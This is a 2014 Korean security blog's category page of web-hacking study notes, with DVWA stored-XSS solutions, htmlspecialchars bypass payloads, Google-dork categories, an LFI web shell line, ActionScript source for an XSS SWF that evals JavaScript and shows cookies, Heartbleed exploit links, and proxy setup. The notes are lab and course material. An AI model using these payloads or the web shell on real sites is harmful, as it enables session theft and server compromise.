'30./31. Web'에 해당되는 글 15건

  1. 2014.10.13 [XSS] PHP htmlspecialchars 우회
  2. 2014.10.10 Obfuscated code
  3. 2014.07.01 [정보수집] Google Hacking (1)
  4. 2014.06.27 [XSS] Xenotix XSS Exploit Framework
  5. 2014.06.21 Miss-Configuration
  6. 2014.06.21 Inclusion Attacks
  7. 2014.04.29 Actionscript XSS using flash
  8. 2014.04.19 URL 한글 인코딩, 디코딩
  9. 2014.04.19 OpenSSL HeartBleed 취약점
  10. 2014.04.17 The Hacker Firefox
  11. 2014.04.16 22. 세션고정(SF) 취약점
  12. 2014.03.20 Flash SWF을 이용한 XSS
  13. 2014.02.05 [DVWA] Damn Vulnerable Web Application 설치 (1)
  14. 2013.12.04 인터넷 익스플로러에서 프록시 서버를 통한 설정 후, 직접 통신
  15. 2013.10.22 [SSL Proxy/Charles] iPhone, iPad의 SSL 네트워크 트레픽 확인.

[XSS] PHP htmlspecialchars 우회


PHP htmlspecialchars 함수 우회 가능성을 확인


Damn Vulnerable Web App(DVWA)에서 Stored XSS를 풀고 있는데 low와 medium의 경우 쉽게 풀리지만 high의 경우 htmlspecialchars()함수를 사용하기 때문에 쉽게 문제 풀이를 진행하지 못하고있다.


Damn Vulnerable Web App(DVWA) : Stored XSS



# Stored XSS Low 


<script>alert(1)</script>





# Stored XSS medium

message의 경우 htmlspecialchars() 함수를 사용하여 스크립트 문자열이 치환되어 사용되지 않는다. name의 경우 htmlspecialchars()함수를 사용하지 않고 <script>만 공백으로 치환하므로 공격을 시도한다.


name의 경우 maxlength가 10이므로 해당 제한을 개발자 도구로 제거하거나 중간프록시 툴을 이용하여 우회하여 스크립트를 삽입한다. 


<scr<script>ipt>alert(2)</script>




# Stored XSS high


포기...



htmlspecialchars() 함수


PHP의 htmlspecialchars() 함수는 웹 페이지에서 html로 인식되는 태그 문자열을 변환해주는 함수이다. 예를 들어 "<"(less than) 와 ">"(greater than)와 같은 미리 정의된 문자열을 HTML entities로 변경해준다.


htmlspecialchars.php 소스

<?php

$str = "This is some <b>bold</b> text.";

echo htmlspecialchars($str);

?> 


View Source(페이지 소스 확인)

<!DOCTYPE html>

<html>

<body>

This is some &lt;b&gt;bold&lt;/b&gt; text.

</body>

</html>


웹 브라우저에서 확인


 This is some <b>bold</b> text.


정의 및 사용


htmlspecialchars() 함수는 미리 정의된 문자들을 HTML entities로 변경해준다.


미리 정의된 문자 :

  • & (ampersand) becomes &amp;
  • " (double quote) becomes &quot;
  • ' (single quote) becomes &#039;
  • < (less than) becomes &lt;
  • > (greater than) becomes &gt;


문법 :


 htmlspecialchars(string,flags,character-set,double_encode)


 참조 : w3schools : http://www.w3schools.com/php/func_string_htmlspecialchars.asp





htmlspecialchars() 함수 XSS 우회




# Str_replace 우회

<?php

echo "<html><br>";

echo 'Your name is ' . str_replace('script', null, $_GET["name"]);

 /*

xss1.php?name=admin

Output: "Your name is admin"

*/

echo "<br></html>";

?>

많은 보안 가이드를 보면 <script>와 같은 XSS발생 가능한 모든 html 테그를 replace하라고 한다. 하지만 이 방법은 다른 보안 취약점을 발생할 가성이 높으며, 여전히 보안 홀이 크다.


xss1.php 소스코드


xxs1.php?name=oneandonlyme


xxs1.php?name=<script>alert("XSS");</script>

script 필터링을 확인 가능하다.


xss1.php?name=<ScRiPt>alert(String.fromCharCode(88,83,83))</ScRiPt>




#htmlentities 우회

<?php

echo "<img alt='Profile' src='".htmlentities($_GET["img"])."' />";

/*

page.php?img=photo-1.jpg

Output: <img alt='Profile' src='photo-1.jpg' />

*/

?>

htmlentities 함수도 html 테그를 자동으로 변환하여 준다.


xss2.php 소스코드


원래 소스코드는 경로를 받아와서 호출하는 웹 페이지입니다.


xss2.php?img=.%BF%27 STYLE=xss:expression(alert(1));

STYLE 테그를 이용하는 XSS가 발생 가능하다.



#  htmlspecialchars 우회

<?php

echo "<html><br>";

echo '<object data="'.htmlspecialchars($_GET['img']).'"></object>';

/*

xss3.php?img=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=

Output: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4="></object>

*/

echo "<br></html>";

?>


xss3.php 소스코드



xss3.php?img=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=

htmlspecialchars()  함수를 사용하여도 인코딩된 입력값은 변환이 불가능하다. 그러므로 XSS가 발생함을 확인 가능하다.


XSS 취약점에 대해서 PHP 소스 보안대책으로 htmlspecialchars() 사용을 권장하지만 잘못된 코딩방식으로 안전한 함수를 취약하게 사용 할 수 있다. 


 출처 :  WIREMASK : http://wiremask.eu/how-to-bypass-xss-filters/



xss1.php


xss2.php


xss3.php


저작자 표시 비영리 변경 금지
신고

'30. > 31. Web' 카테고리의 다른 글

[XSS] PHP htmlspecialchars 우회  (0) 2014.10.13
Obfuscated code  (0) 2014.10.10
[정보수집] Google Hacking  (1) 2014.07.01
[XSS] Xenotix XSS Exploit Framework  (0) 2014.06.27
Miss-Configuration  (0) 2014.06.21
Inclusion Attacks  (0) 2014.06.21

Obfuscated code

30./31. Web 2014.10.10 11:53
Input the JJEncode here:
Decoded JJEncode String:

0 character(s)



http://htmlobfuscator.com/

http://cat-in-136.github.io/2010/12/aadecode-decode-encoded-as-aaencode.html

저작자 표시 비영리 변경 금지
신고

'30. > 31. Web' 카테고리의 다른 글

[XSS] PHP htmlspecialchars 우회  (0) 2014.10.13
Obfuscated code  (0) 2014.10.10
[정보수집] Google Hacking  (1) 2014.07.01
[XSS] Xenotix XSS Exploit Framework  (0) 2014.06.27
Miss-Configuration  (0) 2014.06.21
Inclusion Attacks  (0) 2014.06.21

Google Hacking 

 

Target website / domain: (e.g. att.com)

Search for directory listing vulnerabilities:

Google Search

Search for configuration files:

Google Search

Search for database files:

Google Search

Search for log files:

Google Search

Search for backup and old files:

Google Search

Search for login pages:

Google Search

Search for SQL errors:

Google Search

Search for publicly exposed documents

Google Search

Search for phpinfo():

Google Search

 

※ 출처 https://pentest-tools.com

저작자 표시
신고

'30. > 31. Web' 카테고리의 다른 글

[XSS] PHP htmlspecialchars 우회  (0) 2014.10.13
Obfuscated code  (0) 2014.10.10
[정보수집] Google Hacking  (1) 2014.07.01
[XSS] Xenotix XSS Exploit Framework  (0) 2014.06.27
Miss-Configuration  (0) 2014.06.21
Inclusion Attacks  (0) 2014.06.21

Xenotix XSS Exploit Framework



Introduction


Cross Site Scripting (이하, XSS) 취약점은 1990년대 부터 알려진 공격이다. XSS는 OWASP 2010 웹 취약점 항목에서도 2번째 있었고, OWASP 2013 웹 취약점 항목에는 3번째 위치하고 있다.

[출처 : www.owasp.org]

Cross-site scripting(XSS)은 공격자가 웹 어플리케이션에 Client-Side Script가 삽입 가능한 보안 취약점을 이용하여 다른 사용자가 해당 페이지를 브라우저에서 봤을 때 발생한다. injection 코드는 Client 측에서 실행된다. 공격자는 Cross-site scripting 취약점을 이용하여 Same Origin Policy (SOP)을 우회 할 수있다. 예전에는 XSS 취약점의 발생가능성에 대해 잘 알지 못했다. XSS를 이용하여 쿠키를 훔치거나 영구적으로 영향을 끼치는 공격이 많이 알려져 있기때문에 위험이 높은 공격으로 고려하지 않았다. 하지만 최근에 XSS의 영향력은 터널링이 페이로드 제공으로 강력해졌다. 대부분의 거대한 웹 사이트는 XSS 버그를 가지고있다.

XSS를 통한 위협


- XSS Tunneling : 해커는 XSS 터널을 이용하여 타겟과 웹 사이트의 트렉픽을 얻을 수 있다.

- Client side code injection : 해커는 Clinet에서 악성 코드를 삽입 및 실행 가능하다.

- DOS : 해커는 원격 서버나, Client 모두 DOS 공격 가능하다.

- Cookie Stealing : 해커는 다른 사용자의 웹 사이트 세션 쿠키나 토큰 획득이 가능하다.

- Malware Spreading: 해커는 웹 사이트의 XSS 취약점을 이용하여 악성코드 배포 가능하다.

- Phishing : 해커는 타겟의 로그인 증명(id, password)와 같은 정보를 얻기위해 가짜 사이트로 리다이렉트나 해당 사이트에 포함 시킬 수 있다.

- Defacing : 웹 어플리케이션을 일시적이나 영구적으로 훼손 할 수 있다.


Need for a new Tool


많은 툴들이 웹 어플리케이션의 XSS 취약점 탐지가 가능하다. 하지만 대부분 쉽게 사용 불가능하거나, 수동으로 페이로드를 설정해야한다.


What is Xenotix XSS Exploit Framework?


Xenotix XSS Exploit Framework은 웹 어플리케이션의 XSS 취약점을 탐지하거나 공격하기 위한 모의해킹 테스트 툴이다. 이 툴은 XSS 취약점으로 웹 사이트에 코드 인젝션이 가능하다. XSS 스캐너는 페이로드 목록을 기반으로 하고있다. 해당 침투테스트를 이용하여 쉽게 웹 어플리케이션의 XSS 페이로드 목록에서 침투 가능한 기능을 제공한다. 툴은 기본 테스트에서 시간공유를 하여 수동/자동 공격 모두 가능하다. 실행프로그램 Drive-by 다운로드, 키로거, XSS 인코더와 같은 기능도 포함하고 있다.


Feature of Xenotix XSS Exploit Framewoork


- Built in XSS 페이로드

- XSS 키로거

- XSS 실행 가능한 Drive-by 다운로더

- 자동 XSS 테스터

- XSS 인코더


Xenotix 실행하면 Internet Explorer, Chrome, Firefox 3가지 화면은 한 view에 볼 수 있다.


 ※ 참조

 OWASP Xenotix XSS Exploit Framework

 https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework


저작자 표시
신고

'30. > 31. Web' 카테고리의 다른 글

Obfuscated code  (0) 2014.10.10
[정보수집] Google Hacking  (1) 2014.07.01
[XSS] Xenotix XSS Exploit Framework  (0) 2014.06.27
Miss-Configuration  (0) 2014.06.21
Inclusion Attacks  (0) 2014.06.21
Actionscript XSS using flash  (0) 2014.04.29

Miss-Configuration

30./31. Web 2014.06.21 13:31

Miss-Configuration



 주의 : 본 글은 K-Shield 1차과정(Raon)에서 웹 해킹 과정입니다.






인터넷 구글에서 확인 가능한 아파치 웹 서버 인증 방법

<Limit GET, POST> 웹 서버 인증을 GET과 POST만 제한하도록 설정을 확인가능합니다.




인터넷에 있는 방법으로 설정하고 해당 웹 서버를 접속하면 Windows 보안 인증을 한다.





putty를 이용해서 GET으로 접속한다면 제한된다는 응답값을 받을 수 있다.




GET, POST를 제외한 해더값을 이용하여 접근 가능하다.





저작자 표시
신고

'30. > 31. Web' 카테고리의 다른 글

[정보수집] Google Hacking  (1) 2014.07.01
[XSS] Xenotix XSS Exploit Framework  (0) 2014.06.27
Miss-Configuration  (0) 2014.06.21
Inclusion Attacks  (0) 2014.06.21
Actionscript XSS using flash  (0) 2014.04.29
URL 한글 인코딩, 디코딩  (0) 2014.04.19

Inclusion Attacks

30./31. Web 2014.06.21 13:22

Inclusion Attacks




 주의 : 본 글은 K-Shield 1차과정(Raon)에서 웹 해킹 과정입니다.



RFI(Remote File Inclusion)







LFI(Local File Inclusion)






log file





































<?=system($_GET[cmd])?>





저작자 표시
신고

'30. > 31. Web' 카테고리의 다른 글

[XSS] Xenotix XSS Exploit Framework  (0) 2014.06.27
Miss-Configuration  (0) 2014.06.21
Inclusion Attacks  (0) 2014.06.21
Actionscript XSS using flash  (0) 2014.04.29
URL 한글 인코딩, 디코딩  (0) 2014.04.19
OpenSSL HeartBleed 취약점  (0) 2014.04.19

Actionscript XSS using Flash


Flash의 Action Script를 이용한 XSS


XSS.zip


Source Code



/*

modify by. oneandonlyme.kain@gmail.com

2014/04/29

xss - flash security test script.

ref: fly_flash

*/


import flash.net.*;

import flash.events.SecurityErrorEvent;


var param:Object = root.loaderInfo.parameters;

var action:String = param["a"];

var cmd:String = param["c"];


function attack(action)

{

switch (action)

{

case "l" :// location URL

navigateToURL(new URLRequest(cmd),"_self");

break;

case "o" :// open URL

navigateToURL(new URLRequest(cmd),"_blank");

break;

case "g" :// GET

var loader:URLLoader = new URLLoader(new URLRequest(cmd));

loader.addEventListener(Event.COMPLETE,get_complete);

loader.addEventListener(SecurityErrorEvent.SECURITY_ERROR,get_sec_error);

break;

case "e" :// execute JS

flash.external.ExternalInterface.call("eval", cmd);

break;

case "a" :// execute JS

cmd = 'alert(document.cookie)';

flash.external.ExternalInterface.call("eval", cmd);

break;

case "x" :// execute JS

cmd = 'alert("XSS TEST")';

flash.external.ExternalInterface.call("eval", cmd);

break;

default :

var help:String = 'a(action) - c(cmd)\n';

help +=  '-----------------\n';

help +=  '1. location to url: xss.swf?a=l&c=http://www.google.com/\n';

help +=  '2. open url to new window: xss.swf?a=o&c=http://www.google.com/\n';

help +=  '3. http request to url: xss.swf?a=g&c=http://www.google.com/\n';

help +=  '4. eval js codz: xss.swf?a=e&c=alert(document.domain)\n';

help +=  '5. js code alert(document.cookie): xss.swf?a=a\n';

help +=  '6. XSS TEST: xss.swf?a=x\n';

help +=  '-----------------\n';

help +=  'by oneandonlyme.kain@gmail.com';

flash.external.ExternalInterface.call("alert", help);

break;

}

stop();

}


function get_complete(event:Event)

{

flash.external.ExternalInterface.call("alert", 'corss domain request ok.');

// __flash__toXML(alert("")) may be error.;

//var d:String = String(event.target.data);

//flash.external.ExternalInterface.call("alert", d);

}

function get_sec_error(event:SecurityErrorEvent)

{

flash.external.ExternalInterface.call("alert", '[security error:]\n/crossdomain.xml\ncross domain request is not allowed.');

}


attack(action);








저작자 표시
신고

'30. > 31. Web' 카테고리의 다른 글

Miss-Configuration  (0) 2014.06.21
Inclusion Attacks  (0) 2014.06.21
Actionscript XSS using flash  (0) 2014.04.29
URL 한글 인코딩, 디코딩  (0) 2014.04.19
OpenSSL HeartBleed 취약점  (0) 2014.04.19
The Hacker Firefox  (0) 2014.04.17

URL 한글 인코딩, 디코딩



Encoding

>


Decoding


>



저작자 표시
신고

'30. > 31. Web' 카테고리의 다른 글

Inclusion Attacks  (0) 2014.06.21
Actionscript XSS using flash  (0) 2014.04.29
URL 한글 인코딩, 디코딩  (0) 2014.04.19
OpenSSL HeartBleed 취약점  (0) 2014.04.19
The Hacker Firefox  (0) 2014.04.17
22. 세션고정(SF) 취약점  (0) 2014.04.16

OpenSSL HeartBleed 취약점


네트워크를 통한 데이터 통신에 쓰이는 프로토콜인 TLS와 SSL의 오픈 소스 구현판인 OpenSSL의 라이브러리인 HeartBeat에서 서버에 저장된 중요 메모리 데이터가 노출되는 취약점 발견되었습니다.

* 본 보안 취약점(CVE-2014-0160)은 하트블리드(HeartBleed)로 알려져 있음


※ 참조 : http://heartbleed.com/


  • 발생 원인

OpenSSL 암호화 라이브러리의 하트비트(Heartbeat)라는 확장 모듈에서 클라이언트 요청 메시지를 처리할 때 데이터 길이 검증을 수행하지 않아 시스템 메모리(서버)에 저장된 64KB 크기의 데이터를 외부에서 아무런 제한 없이 탈취할 수 있는 취약점입니다.

· HeartBeat : 통신 시 연결의 유지, 서버의 상태 체크 등을 목적으로 이용

· 노출 가능한 정보 : SSL 서버 비밀키, 세션키, 쿠키 및 개인정보 등 

    (원격 메모리 덤프, 위치는 지정 불 가능함)


  • 공격방법
    1. (전송) 공격자는 하트비트 패킷 헤더에서 페이로드 길이 필드를 조작하여 서버에 전송
    2. (응답) 서버는 공격자가 요청한 길이(최대 64KB)만큼 메모리에서 데이터를 추출하여 공격에게 응답


  • 취약 버전 및 관련 정보
     · Version : OpenSSL 1.0.1 ~ 1.0.1.F (2014.04.08. openssl-10.1g에서 패치됨)
     · 파일 및 함수명: "d1_both.c" dtls1_process_heartbeat 함수, "t1_lib.c" tls1_process_heartbeat 함수 내 코드 패치


  • 보안 취약점
    ·  데이터 길이를 확인하지 않고 안전하지 않은 메모리 복사 함수 이용
    ·  HeartBeat(RFC 6520) 기능 구현 시 악용 가능한 취약점 존재

 구분

소스코드 

 비고

 openssl-1.0.1e

dtls1_process_heartbeat(SSL * s){

....

  n2s(p, payload);

  pl = p;

....

 입력 데이터 크기를 확인하지 않음

 openssl-1.0.1g

 dtls 1_process_heartbeat(SSL *s){

...

  n2s(p, payload);

  if ( 1 + 2 + payload + 16 > s->s3->rrec.length)

    return 0; /* silently discard per RFC 6520 sec. 4 */

  pl = p;

...

 입력 데이터 크기를 확인하고 예외 사항 처리




Heartbleed test.zip


  • 취약점 여부 확인

· http://filippo.io/Heartbleed/

  • 공격 스크립트

· 파이썬(기본형) : http://www.exploit-db.com/exploits/32745/

· 파이썬(발전형) : https://github.com/sensepost/heartbleed-poc/blob/master/heartbleed-poc.py

· 파이썬(발전형) : https://raw.githubusercontent.com/musalbas/heartbleed-masstest/master/ssltest.py

· NMAP sslheartbleed 기능 : http://nmap.org/nsedoc/scripts/ssl-heartbleed.html

· C언어 : http://www.exploit-db.com/exploits/32791/ 




※ 참조

KISA 인터넷침해대응센터 : http://krcert.or.kr/

http://legend.anycert.co.kr/support/openssl_install.html







저작자 표시
신고

'30. > 31. Web' 카테고리의 다른 글

Actionscript XSS using flash  (0) 2014.04.29
URL 한글 인코딩, 디코딩  (0) 2014.04.19
OpenSSL HeartBleed 취약점  (0) 2014.04.19
The Hacker Firefox  (0) 2014.04.17
22. 세션고정(SF) 취약점  (0) 2014.04.16
Flash SWF을 이용한 XSS  (0) 2014.03.20

The Hacker Firefox

30./31. Web 2014.04.17 00:27

The Hacker Firefox


21개의 Addon이 설치되어 있는 포터블  Firefox


 Tool name

 The Hacker Firefox

 Author

 YGN Ethical Hacker Group

 Website

 http://sourceforge.net/projects/hackfox/

 License type

 Free

 Download







설치되어있는 Addon 목록


1. Firebug

https://addons.mozilla.org/ko/firefox/addon/firebug/

2. Googlebar Lite

https://addons.mozilla.org/ko/firefox/addon/googlebar-lite/

3. HackBar

https://code.google.com/p/hackbar/

4. JavaScript Debugger

http://www.hacksrus.com/~ginda/venkman/

5. NF-Tools

http://www.net-force.nl/

6. LiveHttpHeaders

http://livehttpheaders.mozdev.org/

7. ServerSpy

http://www.jacquet80.eu/mozilla/exts/ServerSpy/

8. Selenuim IDE

http://docs.seleniumhq.org/projects/ide/

9. PhProxy

https://addons.mozilla.org/en-US/firefox/addon/phzilla/

10. SwitchProxy

http://mozmonkey.com/

11. FireEncrypter

http://www.jungsonnstudios.com/Mozilla/

12. InFormEnter

http://informenter.mozdev.org/

13. SuperDragAndGo

https://addons.mozilla.org/ko/firefox/addon/super-dragandgo/

14. TamperData

http://tamperdata.mozdev.org/

15. WebDevloper

http://chrispederick.com/work/web-developer/

16. Technika

http://www.gnucitizen.org/blog/technika/

17. ViewSource Chart

http://www.zigrat.com/

18. UserAgent Switcher

http://chrispederick.com/work/user-agent-switcher/

19. ShowIP

http://l4x.org/projects/showip.html

20. GreaseMonkey

http://l4x.org/projects/showip.html

21. OpenAsWebFolder

http://openwebfolder.mozdev.org/



저작자 표시
신고

'30. > 31. Web' 카테고리의 다른 글

URL 한글 인코딩, 디코딩  (0) 2014.04.19
OpenSSL HeartBleed 취약점  (0) 2014.04.19
The Hacker Firefox  (0) 2014.04.17
22. 세션고정(SF) 취약점  (0) 2014.04.16
Flash SWF을 이용한 XSS  (0) 2014.03.20
[DVWA] Damn Vulnerable Web Application 설치  (1) 2014.02.05

22. 세션고정(SF) 취약점


  • 취약점 설명

세션값을 고정하여 명확한 세션 식별자(ID) 값으로 사용자가 로그인하여 정의된 세션 식별자(ID)가 사용 가능하게 되는 취약점


  • 판단기준(조건)

- 로그인(인증절차) 전후로 세션이 변하지 않고 처음 웹 서버에 접속할때 세션을 고정하여 사용한다

- IP가 다른 두개의 PC에서 동일한 세션으로 접근이 가능하다


  • 모의해킹 시나리오
      1. 해커는 웹(Target)서버에 접근하여 정상 세션을 발급받는다.
      2. 해커는 희생자(admin)에게 해커가 받은 정상 세션을 강제로 Set-Cookie하고 웹으로 리다이렉트 하는 스크립트를 메일로 전송한다.
      3. 희생자(admin)는 해커가 보낸 메일을 확인하고 스크립트를 실행한다.
      4. 희생자(admin)는 웹(Target)에 접근할때 해커와 같은 세션으로 접근하게 된다.
      5. 희생자(admin)는 정상적으로 관리자 페이지에 로그인한다.
      6. 관리자 페이지에 로그인(인증절차)을 하여도 세션이 로그인 전후로 변하지 않는다.
      7. 해커와 희생자(admin)는 동일한 세션을 사용하기 때문에 해커는 새로고침(F5)을 할때 관리자 권한을 가져온다.




  • 조치 방안

- 로그인 전후로 세션을 재 발급한다.

PHP

<?php

session_start();

$old_sessionid = session_id();

session_regenerate_id();

$new_sessionid = session_id();


echo "Old Session : $old_sessionid<br />";

echo "New Session : $new_sessionid<br />";


print_r($_SESSION);

?>


ASP


JSP




- IP를 체크하여 멀티세션을 막는다.



※ 참고 자료

http://en.wikipedia.org/wiki/Session_fixation



저작자 표시
신고

XSS using a Flash SWF



xss.zip


a tiny tool for swf hacking, just browse it:)

param&value:


a(action) - c(cmd)

1.location to url: xss.swf?a=location&c=http://www.google.com/ 

2.open url to new window: xss.swf?a=open&c=http://www.google.com/ 

3.http request to url: xss.swf?a=get&c=http://www.google.com/ 

4.eval js codz: xss.swf?a=eval&c=alert(document.domain)

--------------------------------------------------------------------------------



localhost/xss.swf?a=location&c=http://www.google.com/






※ 출처

https://github.com/evilcos/xss.swf




※ 참고자료

http://panchocosil.blogspot.kr/2013/07/swf-file-preview-at-googlegroupscom.html

http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/

http://erlend.oftedal.no/blog/?blogid=99

http://www.exploit-db.com/

저작자 표시
신고

DVWA


Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.


다운로드 경로 : http://www.dvwa.co.uk/

DVWA-1.0.8.zip










APMSETUP 설치



C:\APM_Setup\htdocs\ 디렉토리에 DVWA 복사




localhost/DVWA/login.php 접속



Create / Reset Database 클릭















DB 패스워드를 p@sswOrd -> apmsetup 변경








admin / password


저작자 표시
신고

중간 프록시 툴에 안 잡히게 하기.

+) 중간 프록시 툴 Charles는 레코딩 할 URL만 따로 지정 가능 함.

+) Mozilla Firefox는 프록시 서버를 잡아둔 브라우저만 프록시 툴에서 잡힘.


사용 도구 : 익스플로러(iexplorer 8), 웹 프록시 툴(burp suite)



※ 참고자료 : http://support.microsoft.com/kb/602066/ko


인터넷 익스플로러에서 프록시 서버를 통한 연결 설정 후, 특정 주소들은 프록시 서버를 통하지 않고 바로 연결되도록 다음과 같이 지정할 수 있습니다.

  1. 도구 - 인터넷 옵션 - 연결 – LAN 설정으로 갑니다.
  2. 위에서 프록시 서버 설정부분에 등록할 프록시 서버 주소와 포트를 입력합니다.
  3. 고급 탭을 클릭한 후, 예외란에 Proxy를 통하지 않고 바로 연결되기를 원하는 주소를 다음의 예와 같이 입력하면 됩니다.
    www.microsoft.com ; www.msn.com

하지만, 위와 같이 세미콜론(;)으로 구분하여 주소를 연속하여 입력시 총 입력 주소의 길이가 254자를 넘어설 경우 254자 이상의 주소에는 프록시 서버의 예외 설정이 올바르게 작동하지 않게 됩니다. 








도구 - 인터넷 옵션 - 연결 - LAN 설정(L) - 고급




 *.naver.*;*.nate.*;*.microsoft.*;*.google.*;*.tistory.*



  • 세미콜론(;)을 사용하여, 여러개의 항목을 사용함.

  • 정규식 사용이 가능함.






* 테스트



단, 항목을 *.google.*; 로 작성하여서 http://google.com/XXXX는 프록시 서버를 사용하여 통신함.

저작자 표시
신고


Get Charles


Charles는 HTTP나 SSL/HTTPS를 볼 수 있는 HTTP proxy, HTTP monitor, Reverse Proxy 도구이다.

인터넷과 iPhone/iPad(장비) 사이의 Requests, Responses, HTTP Header(cookies, caching 정보) 등을 확인 가능하다.


http://www.charlesproxy.com 찰스 다운로드




찰스 설치 후 실행화면



Proxy > Proxy Settings



Proxies > HTTP proxy port 설정(기본 값 8888)



SSL > SSL Proxying 설정 (Enable SSL Proxying)







Locations에 Host : *, Port : * 추가







Installing certificates on your computer

Charles가 설치된 컴퓨터에 SSL인증서(Charles CA Certificate bundle) 설치

  ssl.zip 다운 URL : http://www.charlesproxy.com/ssl.zip












Installing certificate on your device

iPhone/iPad(장비)에 Charles를 신뢰할 수 있도록 SSL Client인증서 설치

설치 URL : http://charlesproxy.com/charles.crt

iPhone/iPad에서 Safari로 접속하여 설치



Charles Proxy SSL Profile 확인 가능

iPhone의 설정 > 일반 > 프로파일









Wi-Fi setttings on device

iPhone의 설정 > Wi-Fi > 네트워크 선택 > HTTP 프록시 설정







SSL 네트워크 트레픽 확인 가능




※참조 : http://damir.me/posts/intercept-ssl-traffic-on-your-iphone-or-ipad

저작자 표시
신고
1 

카운터

Total : 85,369 / Today : 1 / Yesterday : 31
get rsstistory!